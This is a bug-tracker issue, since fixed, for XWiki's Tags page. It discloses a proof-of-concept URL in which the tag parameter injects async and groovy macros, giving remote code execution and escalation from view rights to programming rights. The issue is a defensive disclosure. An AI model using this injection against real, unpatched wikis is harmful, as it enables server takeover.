Details
-
Bug
-
Resolution: Fixed
-
Blocker
-
2.0
Description
Steps to reproduce:
Open <server>/xwiki/bin/view/Main/Tags?do=viewTag&tag=%7B%7Basync%20async%3D%22true%22%20cached%3D%22false%22%20context%3D%22doc.reference%22%7D%7D%7B%7Bgroovy%7D%7Dprintln(%22hello%20from%20groovy!%22)%7B%7B%2Fgroovy%7D%7D%7B%7B%2Fasync%7D%7D
Expected result:
Tags for
{{async async="true" cached="false" context="doc.reference"}}{{groovy}}println("hello from groovy!"){{/groovy}}{{/async}}
are displayed.
Actual result:
Tags for hello from groovy! are displayed.
This demonstrates a privilege escalation attack from view rights on Main.Tags to programming rights. This is also a remote code execution attack.
This affects most likely all versions of XWiki containing the async macro (version 11.6RC1 and later) that allows to circumvent the script macro nesting protection. Similar attacks might also be possible with the job macro, this is to be verified.
Attachments
Issue Links
- is caused by
-
XATAG-23 Convert Documents to XWiki Syntax 2.0 and fill their title field
- Closed
- links to